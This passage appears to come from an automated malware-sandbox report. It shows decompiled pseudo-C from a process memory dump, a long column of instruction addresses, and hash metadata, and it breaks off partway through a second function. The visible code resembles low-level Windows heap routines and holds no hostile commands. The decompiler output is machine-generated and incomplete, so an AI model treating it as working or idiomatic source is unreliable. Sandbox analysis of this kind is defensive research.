																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}








































































































                            0x00abf90b
                            0x00abf911
                            0x00abf917
                            0x00abf919
                            0x00abf91c
                            0x00b15d63
                            0x00b15d69
                            0x00b15d69
                            0x00b15d63
                            0x00abf922
                            0x00abf927
                            0x00b15d72
                            0x00b15d78
                            0x00b15d78
                            0x00b15d72
                            0x00abf92d
                            0x00abf931
                            0x00abfa2d
                            0x00abfa2d
                            0x00abf939
                            0x00abf940
                            0x00abf944
                            0x00abfa37
                            0x00abfa39
                            0x00abfa3c
                            0x00abfa3e
                            0x00abfa41
                            0x00abfa48
                            0x00abfe68
                            0x00abfe6c
                            0x00abfe6c
                            0x00abfe78
                            0x00abfe78
                            0x00abfe7a
                            0x00abfe7a
                            0x00abfe7e
                            0x00abfe6e
                            0x00abfe6e
                            0x00abfe72
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abfe80
                            0x00abfe80
                            0x00abfe83
                            0x00000000
                            0x00abfe83
                            0x00b15d7f
                            0x00b15d81
                            0x00000000
                            0x00000000
                            0x00b15d87
                            0x00000000
                            0x00b15d87
                            0x00abfa4e
                            0x00abfa50
                            0x00b15d90
                            0x00000000
                            0x00000000
                            0x00b15d98
                            0x00abfa58
                            0x00abfa58
                            0x00abfa5d
                            0x00abfa60
                            0x00abfa63
                            0x00abfa69
                            0x00abfa6b
                            0x00abfa6e
                            0x00abfa71
                            0x00b15da1
                            0x00b15da7
                            0x00b15da7
                            0x00b15da1
                            0x00abfa79
                            0x00ac0071
                            0x00ac0073
                            0x00ac0074
                            0x00000000
                            0x00abfa7f
                            0x00abfa83
                            0x00abfa85
                            0x00b15dae
                            0x00b15dae
                            0x00abfa8b
                            0x00abfa8f
                            0x00abfa98
                            0x00abfaa1
                            0x00abfaa4
                            0x00abfaa6
                            0x00abfaa9
                            0x00abfaac
                            0x00b15db7
                            0x00b15dbd
                            0x00b15dbd
                            0x00b15db7
                            0x00abfab4
                            0x00000000
                            0x00abfaba
                            0x00abfabc
                            0x00abfac2
                            0x00abfac5
                            0x00abfac7
                            0x00abfac7
                            0x00abfad6
                            0x00abfad9
                            0x00abfadf
                            0x00abfae2
                            0x00abfae4
                            0x00abfae7
                            0x00abfaea
                            0x00abfaed
                            0x00b15dc4
                            0x00b15dc9
                            0x00000000
                            0x00000000
                            0x00b15dcf
                            0x00abfaf6
                            0x00abfafa
                            0x00abfafc
                            0x00abfafc
                            0x00abfafe
                            0x00abfb01
                            0x00abfb09
                            0x00abfb0c
                            0x00abfb12
                            0x00abfb14
                            0x00abfb17
                            0x00b15dd6
                            0x00b15dd9
                            0x00b15dde
                            0x00000000
                            0x00000000
                            0x00b15de4
                            0x00b15de7
                            0x00abfb29
                            0x00abfb2c
                            0x00b15df3
                            0x00b15df6
                            0x00b15e06
                            0x00b15e0c
                            0x00b15e0f
                            0x00b15e11
                            0x00000000
                            0x00b15e1f
                            0x00000000
                            0x00b15e1f
                            0x00b15e11
                            0x00b15df8
                            0x00b15dfb
                            0x00b15e00
                            0x00000000
                            0x00000000
                            0x00b15e02
                            0x00000000
                            0x00b15e02
                            0x00abfb32
                            0x00abfb35
                            0x00abfb3c
                            0x00b15e26
                            0x00b15e28
                            0x00b15e28
                            0x00b15e2e
                            0x00b15e3c
                            0x00b15e3c
                            0x00b15e2e
                            0x00abfb45
                            0x00abfb47
                            0x00abfb53
                            0x00abfb56
                            0x00abfb59
                            0x00abfb5c
                            0x00abfb65
                            0x00ac000d
                            0x00000000
                            0x00ac000f
                            0x00ac000f
                            0x00000000
                            0x00ac000f
                            0x00abfb6b
                            0x00abfb6e
                            0x00abfb71
                            0x00abfb73
                            0x00abfb76
                            0x00b15e45
                            0x00b15e4b
                            0x00b15e4b
                            0x00b15e45
                            0x00abfb80
                            0x00abfb83
                            0x00b15e54
                            0x00b15e5a
                            0x00b15e5a
                            0x00b15e54
                            0x00abfb89
                            0x00abfb98
                            0x00abfb9b
                            0x00abfb9e
                            0x00abfba0
                            0x00b15e63
                            0x00b15e69
                            0x00b15e69
                            0x00b15e63
                            0x00abfba8
                            0x00000000
                            0x00abfbae
                            0x00abfbb2
                            0x00b15e70
                            0x00abfbb8
                            0x00abfbb8
                            0x00abfbb8
                            0x00abfbbd
                            0x00abfbbf
                            0x00abfbbf
                            0x00abf9a8
                            0x00abf9a8
                            0x00abf9ad
                            0x00abf9b4
                            0x00b15eda
                            0x00000000
                            0x00000000
                            0x00b15ee2
                            0x00abf9bc
                            0x00abf9bc
                            0x00abf9bf
                            0x00abf9c4
                            0x00abfde6
                            0x00abfde9
                            0x00abfdec
                            0x00abfdef
                            0x00abfdf2
                            0x00b15eeb
                            0x00b15ef1
                            0x00b15ef1
                            0x00b15eeb
                            0x00abfdfa
                            0x00000000
                            0x00abfe00
                            0x00abfe04
                            0x00b15efa
                            0x00b15f00
                            0x00b15f00
                            0x00b15efa
                            0x00abfe0a
                            0x00abfa24
                            0x00abfa2a
                            0x00abfa2a
                            0x00abfdfa
                            0x00abf9cd
                            0x00000000
                            0x00abf9cf
                            0x00abf9cf
                            0x00abf9d1
                            0x00abf9d4
                            0x00abf9d7
                            0x00abf9d9
                            0x00abf9dc
                            0x00abf9df
                            0x00abf9e2
                            0x00abf9e7
                            0x00b15f09
                            0x00000000
                            0x00000000
                            0x00b15f11
                            0x00abf9ef
                            0x00abf9f3
                            0x00abfed5
                            0x00abfed8
                            0x00abfedb
                            0x00b15f1a
                            0x00b15f20
                            0x00b15f20
                            0x00b15f1a
                            0x00abfee3
                            0x00000000
                            0x00abfee9
                            0x00abfeeb
                            0x00b15f29
                            0x00b15f2f
                            0x00b15f2f
                            0x00b15f29
                            0x00abfef3
                            0x00000000
                            0x00abfef9
                            0x00abfefc
                            0x00abff01
                            0x00b15f38
                            0x00ac0052
                            0x00ac0054
                            0x00000000
                            0x00ac0056
                            0x00ac0056
                            0x00abff40
                            0x00abff42
                            0x00b15f6e
                            0x00b15f74
                            0x00b15f74
                            0x00b15f6e
                            0x00abff50
                            0x00abff56
                            0x00abff5b
                            0x00b15f7d
                            0x00000000
                            0x00000000
                            0x00b15f83
                            0x00000000
                            0x00abff61
                            0x00abff61
                            0x00abff63
                            0x00ac0021
                            0x00ac0026
                            0x00ac002b
                            0x00ac007e
                            0x00ac0080
                            0x00ac0080
                            0x00ac007e
                            0x00ac002f
                            0x00000000
                            0x00ac0031
                            0x00ac0033
                            0x00ac0086
                            0x00ac0035
                            0x00ac0035
                            0x00ac0035
                            0x00ac003c
                            0x00000000
                            0x00ac003c
                            0x00ac002f
                            0x00abff69
                            0x00abff6b
                            0x00b15f8c
                            0x00b15f92
                            0x00b15f92
                            0x00b15f8c
                            0x00abff74
                            0x00abff77
                            0x00abff7b
                            0x00b15f99
                            0x00b15f9b
                            0x00abff81
                            0x00abff81
                            0x00abff83
                            0x00abff83
                            0x00abff88
                            0x00abff8b
                            0x00abff90
                            0x00abff92
                            0x00abff92
                            0x00abff9c
                            0x00abffa2
                            0x00abffa6
                            0x00abffaa
                            0x00abffad
                            0x00abffb2
                            0x00b15fa4
                            0x00b15faa
                            0x00b15faa
                            0x00b15fa4
                            0x00abffb8
                            0x00000000
                            0x00abffb8
                            0x00abff5b
                            0x00ac0054
                            0x00b15f3e
                            0x00b15f3e
                            0x00abff09
                            0x00000000
                            0x00000000
                            0x00abff0f
                            0x00abff14
                            0x00b15f47
                            0x00b15f4d
                            0x00b15f4d
                            0x00b15f47
                            0x00abff1c
                            0x00ac0046
                            0x00ac0076
                            0x00ac0078
                            0x00000000
                            0x00ac0048
                            0x00ac0048
                            0x00ac004a
                            0x00ac004a
                            0x00000000
                            0x00ac004a
                            0x00abff22
                            0x00abff22
                            0x00abff26
                            0x00b15f56
                            0x00b15f5c
                            0x00b15f5c
                            0x00b15f56
                            0x00abff2e
                            0x00000000
                            0x00abff34
                            0x00abff36
                            0x00b15f65
                            0x00abff3c
                            0x00abff3c
                            0x00abff3c
                            0x00abff3e
                            0x00000000
                            0x00abff3e
                            0x00abff2e
                            0x00abff1c
                            0x00abfef3
                            0x00abfee3
                            0x00abf9f9
                            0x00abf9f9
                            0x00abf9fb
                            0x00abf9ff
                            0x00abfbd5
                            0x00b15fb1
                            0x00b15fb1
                            0x00abfbdf
                            0x00000000
                            0x00abfbe5
                            0x00abfbe5
                            0x00abfbe8
                            0x00abfbed
                            0x00b15fdf
                            0x00abfc01
                            0x00abfc01
                            0x00abfc04
                            0x00abfc09
                            0x00b15fee
                            0x00b15ff4
                            0x00b15ff4
                            0x00b15fee
                            0x00abfc0f
                            0x00abfc13
                            0x00abfc1d
                            0x00abfc20
                            0x00abfc23
                            0x00abfc26
                            0x00abfc2b
                            0x00b15ffd
                            0x00b16003
                            0x00b16003
                            0x00b15ffd
                            0x00abfc33
                            0x00000000
                            0x00abfc39
                            0x00abfc3b
                            0x00abfc3e
                            0x00abfc41
                            0x00abfc46
                            0x00b1600c
                            0x00b16012
                            0x00b16012
                            0x00b1600c
                            0x00abfc4e
                            0x00000000
                            0x00abfc54
                            0x00abfc54
                            0x00abfc59
                            0x00b1601b
                            0x00b16021
                            0x00b16021
                            0x00b1601b
                            0x00abfc61
                            0x00000000
                            0x00abfc67
                            0x00abfc6a
                            0x00abfc6f
                            0x00b1602a
                            0x00b16030
                            0x00b16030
                            0x00b1602a
                            0x00abfc77
                            0x00000000
                            0x00abfc7d
                            0x00abfc7f
                            0x00abfc81
                            0x00abfc85
                            0x00abfc87
                            0x00abfc87
                            0x00abfc8c
                            0x00abfc8f
                            0x00abfc94
                            0x00b16039
                            0x00abfc9c
                            0x00abfca4
                            0x00abfcaa
                            0x00abfcaf
                            0x00b16046
                            0x00abfcbd
                            0x00abfcbf
                            0x00b1606d
                            0x00b16073
                            0x00b16073
                            0x00b1606d
                            0x00abfcc8
                            0x00abfccd
                            0x00abfccf
                            0x00abfcd3
                            0x00abfcd5
                            0x00abfcd5
                            0x00abfcde
                            0x00abfce1
                            0x00abfce3
                            0x00abfce3
                            0x00abfce8
                            0x00abfcf0
                            0x00abfcf2
                            0x00abfcf5
                            0x00abfcf7
                            0x00abfcff
                            0x00abfd02
                            0x00abfd06
                            0x00abfd11
                            0x00abfd14
                            0x00abfd17
                            0x00b1607c
                            0x00b16082
                            0x00b16082
                            0x00b1607c
                            0x00abfd1f
                            0x00000000
                            0x00abfd25
                            0x00abfd28
                            0x00abfd2d
                            0x00b1608b
                            0x00b16091
                            0x00b16091
                            0x00b1608b
                            0x00abfd35
                            0x00000000
                            0x00abfd3b
                            0x00abfd3e
                            0x00abfd43
                            0x00b1609a
                            0x00ac0016
                            0x00ac0018
                            0x00000000
                            0x00ac001a
                            0x00ac001a
                            0x00abfd82
                            0x00abfd84
                            0x00b160d9
                            0x00b160df
                            0x00b160df
                            0x00b160d9
                            0x00abfd8d
                            0x00abfd95
                            0x00abfd98
                            0x00abfd9d
                            0x00b160e8
                            0x00000000
                            0x00000000
                            0x00b160ee
                            0x00000000
                            0x00abfda3
                            0x00abfda3
                            0x00abfda5
                            0x00abfe8b
                            0x00abfe90
                            0x00abfe95
                            0x00b160f7
                            0x00b160fd
                            0x00b160fd
                            0x00b160f7
                            0x00abfe9d
                            0x00000000
                            0x00abfea3
                            0x00abfea5
                            0x00b16106
                            0x00abfeab
                            0x00abfeab
                            0x00abfeab
                            0x00abfeb2
                            0x00abfeb5
                            0x00000000
                            0x00abfeb5
                            0x00abfe9d
                            0x00abfdab
                            0x00abfdad
                            0x00b1610f
                            0x00b16115
                            0x00b16115
                            0x00b1610f
                            0x00abfdb6
                            0x00abfdbb
                            0x00b1611e
                            0x00b16120
                            0x00abfdc1
                            0x00abfdc1
                            0x00abfdc5
                            0x00abfdc5
                            0x00abfdc7
                            0x00abfdcc
                            0x00abfdce
                            0x00abfdce
                            0x00abfdd6
                            0x00abfdd8
                            0x00000000
                            0x00abfdd8
                            0x00abfd9d
                            0x00ac0018
                            0x00b160a0
                            0x00b160a0
                            0x00abfd4b
                            0x00000000
                            0x00000000
                            0x00abfd51
                            0x00abfd56
                            0x00b160a9
                            0x00b160af
                            0x00b160af
                            0x00b160a9
                            0x00abfd5e
                            0x00abfebf
                            0x00b160b8
                            0x00abfec5
                            0x00abfec5
                            0x00abfec5
                            0x00abfec7
                            0x00000000
                            0x00abfd64
                            0x00abfd64
                            0x00abfd68
                            0x00b160c1
                            0x00b160c7
                            0x00b160c7
                            0x00b160c1
                            0x00abfd70
                            0x00000000
                            0x00abfd76
                            0x00abfd78
                            0x00b160d0
                            0x00abfd7e
                            0x00abfd7e
                            0x00abfd7e
                            0x00abfd80
                            0x00000000
                            0x00abfd80
                            0x00abfd70
                            0x00abfd5e
                            0x00abfd35
                            0x00abfd1f
                            0x00b1604c
                            0x00b1604c
                            0x00abfcb7
                            0x00abffc0
                            0x00abffc3
                            0x00abffc6
                            0x00abffcb
                            0x00b16055
                            0x00b1605b
                            0x00b1605b
                            0x00b16055
                            0x00abffd3
                            0x00000000
                            0x00abffd9
                            0x00abffdb
                            0x00b16064
                            0x00abffe1
                            0x00abffe1
                            0x00abffe1
                            0x00abffe3
                            0x00abffe7
                            0x00abffed
                            0x00000000
                            0x00abffed
                            0x00abffd3
                            0x00000000
                            0x00abfcb7
                            0x00b1603f
                            0x00abfc9a
                            0x00000000
                            0x00abfc9a
                            0x00abfc77
                            0x00abfc61
                            0x00abfc4e
                            0x00abfc33
                            0x00b15fe5
                            0x00b15fe5
                            0x00abfbf5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abfbf5
                            0x00abfbdf
                            0x00abfa05
                            0x00abfa05
                            0x00abfa0a
                            0x00abfe14
                            0x00b15fb8
                            0x00b15fb8
                            0x00abfe1e
                            0x00000000
                            0x00abfe24
                            0x00000000
                            0x00abfe24
                            0x00abfe1e
                            0x00abfa10
                            0x00abfa10
                            0x00abfa15
                            0x00abfe29
                            0x00abfe2d
                            0x00abfe35
                            0x00abfe38
                            0x00abfe3b
                            0x00b15fc1
                            0x00000000
                            0x00000000
                            0x00b15fc7
                            0x00abfe43
                            0x00abfe45
                            0x00000000
                            0x00000000
                            0x00abfe4b
                            0x00abfe50
                            0x00b15fd0
                            0x00b15fd6
                            0x00b15fd6
                            0x00b15fd0
                            0x00abfe5d
                            0x00abfe60
                            0x00000000
                            0x00abfe60
                            0x00abfe41
                            0x00abfe41
                            0x00000000
                            0x00abfa1b
                            0x00abfa1b
                            0x00abfa1d
                            0x00abfa20
                            0x00000000
                            0x00abfa20
                            0x00abfa15
                            0x00abf9ed
                            0x00abf9ed
                            0x00000000
                            0x00abf9ed
                            0x00abf9cd
                            0x00abf9ba
                            0x00abf9ba
                            0x00000000
                            0x00abf9ba
                            0x00abfba8
                            0x00abfb65
                            0x00abfb1d
                            0x00abfb23
                            0x00abfb26
                            0x00000000
                            0x00abfb26
                            0x00abfaf3
                            0x00abfaf3
                            0x00000000
                            0x00abfaf3
                            0x00abfab4
                            0x00abfa79
                            0x00abfa56
                            0x00abfa56
                            0x00000000
                            0x00abfa56
                            0x00abf94d
                            0x00abf950
                            0x00abf955
                            0x00b15e79
                            0x00b15e7f
                            0x00b15e7f
                            0x00b15e79
                            0x00abf95b
                            0x00abf960
                            0x00b15e88
                            0x00b15e8a
                            0x00b15e8a
                            0x00b15e8e
                            0x00b15e93
                            0x00000000
                            0x00b15e99
                            0x00b15e9c
                            0x00b15e9f
                            0x00b15ea1
                            0x00b15ea3
                            0x00b15ea3
                            0x00b15ea7
                            0x00000000
                            0x00b15ea7
                            0x00abf966
                            0x00abf966
                            0x00abf96b
                            0x00b15eb0
                            0x00b15eb6
                            0x00b15eb6
                            0x00b15eb0
                            0x00abf973
                            0x00abfbc7
                            0x00abf9a5
                            0x00abf9a5
                            0x00000000
                            0x00abf979
                            0x00abf97d
                            0x00abf97f
                            0x00b15ebf
                            0x00b15ec5
                            0x00b15ec5
                            0x00b15ebf
                            0x00abf987
                            0x00000000
                            0x00abf98d
                            0x00abf98d
                            0x00abf990
                            0x00abf994
                            0x00abf997
                            0x00abf99f
                            0x00abfff7
                            0x00ac0061
                            0x00ac0064
                            0x00ac006a
                            0x00b15ece
                            0x00b15ed0
                            0x00b15ed0
                            0x00000000
                            0x00ac0064
                            0x00abfffd
                            0x00ac0000
                            0x00000000
                            0x00ac0006
                            0x00b15ecc
                            0x00000000
                            0x00b15ecc
                            0x00ac0000
                            0x00000000
                            0x00abf99f
                            0x00abf987
                            0x00abf973

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                            • Instruction ID: 7f53d2844d28d57532e4e302a4678f311d12aaf02601591c5d2ba680c16abdba
                            • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                            • Instruction Fuzzy Hash: 3362CF36A04656DECB32CB2888807FABBB5AF95754F2D82B9CC559B243D331DD819780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B85BA5, Relevance: .6, Instructions: 592COMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E00B85BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xb91178);
				E00B0D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = L00B84C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00AFD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							L00B85542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xba60e8;
								if( *0xba60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xba60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00AF9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = L00AF6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00AFF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
